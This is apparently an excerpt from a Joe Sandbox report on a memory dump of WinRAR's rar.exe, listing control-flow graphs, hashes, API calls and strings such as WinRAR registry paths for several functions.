                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                                                                                                                                                                                              • Instruction ID: d7053b721e97c28e9971026a3150774fd8249a99c6abbf4eaada31f9927f9105
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac23bd2f1d97dba6c8ed780cfc15edbe6b4d609a338b12ac683d3955c16e23e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F71C032A05A8586D748DF29E4153ED33A1FB8CB98F084239DB5DCB3A9DF78A051C790

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 7ff6bbcf3ea8-7ff6bbcf3f03 call 7ff6bbd0a5a0 call 7ff6bbd0c8a0 640 7ff6bbcf3f05-7ff6bbcf3f3e GetModuleFileNameW call 7ff6bbce4e14 call 7ff6bbcfa9c0 635->640 641 7ff6bbcf3f40-7ff6bbcf3f50 call 7ff6bbcfa9e8 635->641 645 7ff6bbcf3f55-7ff6bbcf3f79 call 7ff6bbcd1874 call 7ff6bbcd1e80 640->645 641->645 652 7ff6bbcf4692-7ff6bbcf46c5 call 7ff6bbcd18ac call 7ff6bbd0a610 645->652 653 7ff6bbcf3f7f-7ff6bbcf3f89 645->653 655 7ff6bbcf3fae-7ff6bbcf3feb call 7ff6bbd0ec70 * 2 653->655 656 7ff6bbcf3f8b-7ff6bbcf3fac call 7ff6bbcf11c0 * 2 653->656 668 7ff6bbcf3fef-7ff6bbcf3ff3 655->668 656->655 669 7ff6bbcf40f2-7ff6bbcf4112 call 7ff6bbcd22e0 call 7ff6bbd0eb90 668->669 670 7ff6bbcf3ff9-7ff6bbcf402d call 7ff6bbcd2440 call 7ff6bbcd2150 668->670 669->652 679 7ff6bbcf4118-7ff6bbcf4131 call 7ff6bbcd2150 669->679 680 7ff6bbcf4033 670->680 681 7ff6bbcf40bc-7ff6bbcf40e2 call 7ff6bbcd22e0 670->681 693 7ff6bbcf4133-7ff6bbcf4136 679->693 694 7ff6bbcf4138-7ff6bbcf414b call 7ff6bbd0eb90 679->694 684 7ff6bbcf403a-7ff6bbcf403e 680->684 681->668 690 7ff6bbcf40e8-7ff6bbcf40ec 681->690 685 7ff6bbcf4064-7ff6bbcf4069 684->685 686 7ff6bbcf4040-7ff6bbcf4044 684->686 691 7ff6bbcf406b-7ff6bbcf4070 685->691 692 7ff6bbcf4097-7ff6bbcf409f 685->692 686->685 689 7ff6bbcf4046-7ff6bbcf405e call 7ff6bbd12290 686->689 707 7ff6bbcf40a3-7ff6bbcf40a7 689->707 708 7ff6bbcf4060 689->708 690->652 690->669 691->692 696 7ff6bbcf4072-7ff6bbcf4078 691->696 697 7ff6bbcf40a1 692->697 698 7ff6bbcf40b7 692->698 699 7ff6bbcf416f-7ff6bbcf41b1 call 7ff6bbcfa900 call 7ff6bbd0eb90 693->699 694->652 706 7ff6bbcf4151-7ff6bbcf416c call 7ff6bbcfd54c call 7ff6bbd0eb88 694->706 704 7ff6bbcf4093 696->704 705 7ff6bbcf407a-7ff6bbcf4091 call 7ff6bbd11700 696->705 697->684 698->681 718 
7ff6bbcf41b3-7ff6bbcf41bb call 7ff6bbd0eb88 699->718 719 7ff6bbcf41c0-7ff6bbcf41d5 699->719 704->692 705->704 716 7ff6bbcf40a9-7ff6bbcf40b5 705->716 706->699 707->698 708->685 716->681 718->652 722 7ff6bbcf45f0-7ff6bbcf4624 call 7ff6bbcf3884 call 7ff6bbd0eb88 * 2 719->722 723 7ff6bbcf41db 719->723 754 7ff6bbcf464a-7ff6bbcf4691 call 7ff6bbd0ec70 * 2 722->754 755 7ff6bbcf4626-7ff6bbcf4648 call 7ff6bbcf11c0 * 2 722->755 724 7ff6bbcf41e1-7ff6bbcf41ee 723->724 727 7ff6bbcf41f4-7ff6bbcf41fa 724->727 728 7ff6bbcf4508-7ff6bbcf4513 724->728 730 7ff6bbcf41fc-7ff6bbcf4202 727->730 731 7ff6bbcf4208-7ff6bbcf420e 727->731 728->722 733 7ff6bbcf4519-7ff6bbcf4523 728->733 730->728 730->731 736 7ff6bbcf4214-7ff6bbcf425c 731->736 737 7ff6bbcf43d0-7ff6bbcf43e0 call 7ff6bbcfa580 731->737 734 7ff6bbcf4585-7ff6bbcf4589 733->734 735 7ff6bbcf4525-7ff6bbcf452b 733->735 743 7ff6bbcf45a3-7ff6bbcf45d4 call 7ff6bbcf3884 734->743 744 7ff6bbcf458b-7ff6bbcf458f 734->744 739 7ff6bbcf4531-7ff6bbcf4539 735->739 740 7ff6bbcf45db-7ff6bbcf45de 735->740 741 7ff6bbcf4261-7ff6bbcf4264 736->741 760 7ff6bbcf44f0-7ff6bbcf4503 737->760 761 7ff6bbcf43e6-7ff6bbcf4414 call 7ff6bbcfa9e8 call 7ff6bbd1172c 737->761 747 7ff6bbcf4573-7ff6bbcf457a 739->747 748 7ff6bbcf453b-7ff6bbcf453e 739->748 740->722 749 7ff6bbcf45e0-7ff6bbcf45e5 740->749 750 7ff6bbcf4268-7ff6bbcf4270 741->750 743->740 744->743 752 7ff6bbcf4591-7ff6bbcf4597 744->752 762 7ff6bbcf457e-7ff6bbcf4583 747->762 757 7ff6bbcf4540-7ff6bbcf4543 748->757 758 7ff6bbcf456a-7ff6bbcf4571 748->758 749->724 750->750 759 7ff6bbcf4272-7ff6bbcf4288 call 7ff6bbd11700 750->759 752->740 763 7ff6bbcf4599-7ff6bbcf45a1 752->763 754->652 755->754 765 7ff6bbcf4545-7ff6bbcf4548 757->765 766 7ff6bbcf4561-7ff6bbcf4568 757->766 758->762 779 7ff6bbcf42a3 759->779 780 7ff6bbcf428a-7ff6bbcf4295 759->780 760->728 761->760 787 7ff6bbcf441a-7ff6bbcf44a9 call 7ff6bbcfd840 call 7ff6bbcfa900 call 7ff6bbcfa8c4 call 7ff6bbcfa900 call 7ff6bbd115fc 761->787 762->740 763->740 771 
7ff6bbcf454a-7ff6bbcf454d 765->771 772 7ff6bbcf4558-7ff6bbcf455f 765->772 766->762 771->752 777 7ff6bbcf454f-7ff6bbcf4556 771->777 772->762 777->762 786 7ff6bbcf42a7-7ff6bbcf42be 779->786 780->779 784 7ff6bbcf4297-7ff6bbcf42a1 780->784 784->786 786->741 788 7ff6bbcf42c0-7ff6bbcf42c2 786->788 823 7ff6bbcf44bf-7ff6bbcf44cf 787->823 824 7ff6bbcf44ab-7ff6bbcf44bb 787->824 790 7ff6bbcf42c4-7ff6bbcf42d6 call 7ff6bbcfa900 788->790 791 7ff6bbcf42e6 788->791 796 7ff6bbcf42db-7ff6bbcf42e1 790->796 791->737 793 7ff6bbcf42ec 791->793 797 7ff6bbcf42f1-7ff6bbcf42f7 793->797 799 7ff6bbcf45d6 796->799 800 7ff6bbcf4300-7ff6bbcf4303 797->800 801 7ff6bbcf42f9-7ff6bbcf42fe 797->801 799->740 800->797 801->800 803 7ff6bbcf4305-7ff6bbcf4314 801->803 805 7ff6bbcf433d-7ff6bbcf4347 803->805 806 7ff6bbcf4316-7ff6bbcf4320 803->806 809 7ff6bbcf434d-7ff6bbcf4378 call 7ff6bbcfd840 805->809 810 7ff6bbcf45ea-7ff6bbcf45ef call 7ff6bbd0a774 805->810 808 7ff6bbcf4323-7ff6bbcf4327 806->808 808->805 813 7ff6bbcf4329-7ff6bbcf433b 808->813 819 7ff6bbcf439e-7ff6bbcf43cb call 7ff6bbcf470c 809->819 820 7ff6bbcf437a-7ff6bbcf4399 call 7ff6bbd11764 809->820 810->722 813->805 813->808 819->796 820->796 827 7ff6bbcf44d2-7ff6bbcf44d8 823->827 824->823 828 7ff6bbcf44da-7ff6bbcf44e5 827->828 829 7ff6bbcf44eb-7ff6bbcf44ee 827->829 828->799 828->829 829->827
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction ID: 74140f271701fcdc43a7cce94e5f849dfcbb68171f9b5d2378e1493f89f2ac6c
• Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction Fuzzy Hash: 3E22BF22A1868295EB24DB1DD4982F96371FF48784F805136EB5EC7AE9EF3CE548C340

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                              control_flow_graph 1405 7ff6bbcc4fd0-7ff6bbcc502d call 7ff6bbd0a5a0 1408 7ff6bbcc502f-7ff6bbcc5037 1405->1408 1409 7ff6bbcc504d-7ff6bbcc5055 1405->1409 1408->1409 1410 7ff6bbcc5039-7ff6bbcc504b call 7ff6bbd0c8a0 1408->1410 1411 7ff6bbcc506e-7ff6bbcc5089 call 7ff6bbce420c 1409->1411 1412 7ff6bbcc5057-7ff6bbcc5069 call 7ff6bbcc481c 1409->1412 1410->1409 1410->1412 1418 7ff6bbcc509f-7ff6bbcc50b6 call 7ff6bbcfdb08 1411->1418 1419 7ff6bbcc508b-7ff6bbcc509d call 7ff6bbcfa9c0 1411->1419 1412->1411 1424 7ff6bbcc511b-7ff6bbcc5131 call 7ff6bbd0c8a0 1418->1424 1425 7ff6bbcc50b8-7ff6bbcc50c3 call 7ff6bbcfa59c 1418->1425 1419->1424 1430 7ff6bbcc5203-7ff6bbcc520d call 7ff6bbcfaa48 1424->1430 1431 7ff6bbcc5137-7ff6bbcc513e 1424->1431 1425->1424 1432 7ff6bbcc50c5-7ff6bbcc50cf call 7ff6bbcd3054 1425->1432 1440 7ff6bbcc5212-7ff6bbcc521c 1430->1440 1433 7ff6bbcc5140-7ff6bbcc5167 call 7ff6bbce3f98 1431->1433 1434 7ff6bbcc516c-7ff6bbcc51be call 7ff6bbcfaa1c call 7ff6bbcfaa48 call 7ff6bbcf6e98 1431->1434 1432->1424 1441 7ff6bbcc50d1-7ff6bbcc5107 call 7ff6bbcfa9e8 call 7ff6bbcfa9c0 call 7ff6bbcd3054 1432->1441 1433->1434 1489 7ff6bbcc51d3-7ff6bbcc51e8 call 7ff6bbcf7a24 1434->1489 1443 7ff6bbcc5222 1440->1443 1444 7ff6bbcc52db-7ff6bbcc52e0 1440->1444 1441->1424 1515 7ff6bbcc5109-7ff6bbcc5116 call 7ff6bbcfa9e8 1441->1515 1449 7ff6bbcc532f-7ff6bbcc5332 1443->1449 1450 7ff6bbcc5228-7ff6bbcc522d 1443->1450 1445 7ff6bbcc5453-7ff6bbcc5477 call 7ff6bbccf00c call 7ff6bbccf230 call 7ff6bbccf09c 1444->1445 1446 7ff6bbcc52e6-7ff6bbcc52e9 1444->1446 1506 7ff6bbcc547c-7ff6bbcc5483 1445->1506 1454 7ff6bbcc52ef-7ff6bbcc52f2 1446->1454 1455 7ff6bbcc5379-7ff6bbcc5382 1446->1455 1452 7ff6bbcc5334 1449->1452 1453 7ff6bbcc533b-7ff6bbcc533e 1449->1453 1450->1449 1458 
7ff6bbcc5233-7ff6bbcc5236 1450->1458 1452->1453 1462 7ff6bbcc5340 1453->1462 1463 7ff6bbcc5347-7ff6bbcc5358 call 7ff6bbcb1230 call 7ff6bbcb4858 1453->1463 1464 7ff6bbcc52f4-7ff6bbcc52f7 1454->1464 1465 7ff6bbcc536c-7ff6bbcc5374 call 7ff6bbcf81cc 1454->1465 1460 7ff6bbcc5449-7ff6bbcc5451 call 7ff6bbceeab8 1455->1460 1461 7ff6bbcc5388-7ff6bbcc538b 1455->1461 1468 7ff6bbcc5290-7ff6bbcc5299 1458->1468 1469 7ff6bbcc5238-7ff6bbcc523b 1458->1469 1460->1506 1475 7ff6bbcc5391-7ff6bbcc5397 1461->1475 1476 7ff6bbcc541b-7ff6bbcc5433 call 7ff6bbcfab1c 1461->1476 1462->1463 1523 7ff6bbcc535d 1463->1523 1464->1445 1478 7ff6bbcc52fd-7ff6bbcc5300 1464->1478 1465->1506 1480 7ff6bbcc52b2-7ff6bbcc52bd 1468->1480 1481 7ff6bbcc529b-7ff6bbcc529e 1468->1481 1470 7ff6bbcc5274-7ff6bbcc528b call 7ff6bbcb1230 call 7ff6bbcb48ec 1469->1470 1471 7ff6bbcc523d-7ff6bbcc5240 1469->1471 1540 7ff6bbcc535e-7ff6bbcc5362 call 7ff6bbcb14fc 1470->1540 1471->1445 1483 7ff6bbcc5246-7ff6bbcc5249 1471->1483 1494 7ff6bbcc5399-7ff6bbcc539c 1475->1494 1495 7ff6bbcc540c-7ff6bbcc5419 call 7ff6bbce54f8 call 7ff6bbce51e4 1475->1495 1476->1506 1522 7ff6bbcc5435-7ff6bbcc5447 call 7ff6bbcebbd4 1476->1522 1478->1449 1496 7ff6bbcc5302-7ff6bbcc5305 1478->1496 1488 7ff6bbcc52ce-7ff6bbcc52d6 call 7ff6bbce55e0 1480->1488 1491 7ff6bbcc52bf-7ff6bbcc52c9 call 7ff6bbcfa9e8 1480->1491 1487 7ff6bbcc52a0-7ff6bbcc52a6 1481->1487 1481->1488 1483->1449 1498 7ff6bbcc524f-7ff6bbcc5252 1483->1498 1503 7ff6bbcc5313-7ff6bbcc531d call 7ff6bbcc481c 1487->1503 1504 7ff6bbcc52a8-7ff6bbcc52ad call 7ff6bbcc7214 1487->1504 1488->1506 1542 7ff6bbcc51c0-7ff6bbcc51ce call 7ff6bbcfaa48 1489->1542 1543 7ff6bbcc51ea-7ff6bbcc5201 call 7ff6bbcf6f68 call 7ff6bbcb14c0 1489->1543 1491->1488 1510 7ff6bbcc53ef-7ff6bbcc5401 call 7ff6bbcc45c8 1494->1510 1511 7ff6bbcc539e-7ff6bbcc53a1 1494->1511 1495->1506 1512 7ff6bbcc5322-7ff6bbcc532a call 7ff6bbcd67e0 1496->1512 1513 7ff6bbcc5307-7ff6bbcc530a 1496->1513 1498->1445 1517 7ff6bbcc5258-7ff6bbcc525b 1498->1517 
1503->1506 1504->1506 1528 7ff6bbcc5491-7ff6bbcc54bc call 7ff6bbd0a610 1506->1528 1529 7ff6bbcc5485-7ff6bbcc548c call 7ff6bbcc8444 1506->1529 1510->1495 1511->1503 1527 7ff6bbcc53a7-7ff6bbcc53d5 call 7ff6bbcc45c8 call 7ff6bbcfab1c 1511->1527 1512->1506 1513->1445 1530 7ff6bbcc5310 1513->1530 1515->1424 1533 7ff6bbcc525d-7ff6bbcc5260 1517->1533 1534 7ff6bbcc526b-7ff6bbcc5272 1517->1534 1522->1506 1523->1540 1527->1506 1561 7ff6bbcc53db-7ff6bbcc53ea call 7ff6bbceba9c 1527->1561 1529->1528 1530->1503 1533->1512 1547 7ff6bbcc5266 1533->1547 1534->1488 1555 7ff6bbcc5367 1540->1555 1542->1489 1543->1440 1547->1530 1555->1506 1561->1506
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: 5afc33fd9268111ca1f2966b992b39e119640949a8eec9e1450693185fcb3170
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: 47C17461A1858295EA24EF2DC85A1FC12B1BF6D785F485131EB4ECA5FADF2CEA04C350

Control-flow Graph

APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: 2b5f33991c8c405695d4886794a70ca6083febfcc2164ac28000856a9985909e
• Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction Fuzzy Hash: 36418B21A08B8381FA09CB1EA81853967A0BF4CBD4F481271CF5D877B5DF7CE08A8308

Control-flow Graph

APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
• String ID:
• API String ID: 552178382-0
• Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction ID: a13acdddf086cd308f5056e175d381c477dd2c2ca3d0f824494aad605f07ef90
• Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction Fuzzy Hash: 8B311721E0C68385EA1CAB2DA4653BD1792BF5D784F844734EB0D8B2F7DE2CA8048751

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF47DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF4831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF4853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6BBCF495D,?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF48A6
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
• Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction ID: 4d14c7f6bbdb94066b04607de1be3041b286758c35ab9694717643926ebfcf45
• Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction Fuzzy Hash: B131B422718A8185EB64DB29E8542FEA361FF88794F405231EF4D87BE9EF6CD148C700

Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE43D1
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE4402
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE440D
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE443E
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: edaf40955691f393d379f96b60992621fb42de42d0d766686fda5fe4f957d4c9
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: 51116022A2878286EA159F2AE4155ADB360FF8CBC4F445231EB4E87B69DF3CE504C710

Control-flow Graph (graph for the function at 7ff6bbcb7a5b; the node/edge dump is omitted here)
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID:
• String ID: H9
• API String ID: 0-2207570329
• Opcode ID: d10ec36fd9120199c0687508098b586a24a6170a06ec7cc9f6dc87913b656c3a
• Instruction ID: e957a9a08dd90b1c296ffdd9523f8f81fa479e30bc25dd720074e7cd228f57d4
• Opcode Fuzzy Hash: d10ec36fd9120199c0687508098b586a24a6170a06ec7cc9f6dc87913b656c3a
• Instruction Fuzzy Hash: 1EE1DF62A08A9A85EB20DB28E048BFD27B9FB4978CF554536CF4D833A5DF38E554C700

Control-flow Graph (graph for the function at 7ff6bbcd2574, calling GetStdHandle, WriteFile, GetLastError and SetLastError; the node/edge dump is omitted here)
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ErrorFileLastWrite$Handle
• String ID:
• API String ID: 3350704910-0
• Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction ID: cb8d6dea732e871c6ec733f36ed3cdf03265e7c0432e475125d1e93a056070bb
• Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction Fuzzy Hash: 18518526A48A4197EA28DF29F41837A7770FB4DB84F440135DB5E8BAB1DF3CE446C640

Control-flow Graph (graph for the function at 7ff6bbcd1e80, calling CreateFileW, GetLastError and SetFileTime; the node/edge dump is omitted here)
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
• Instruction ID: 6a4e16811d6a6e9292710a2a8a2706296e243ee0a460c81267c04d96105802df
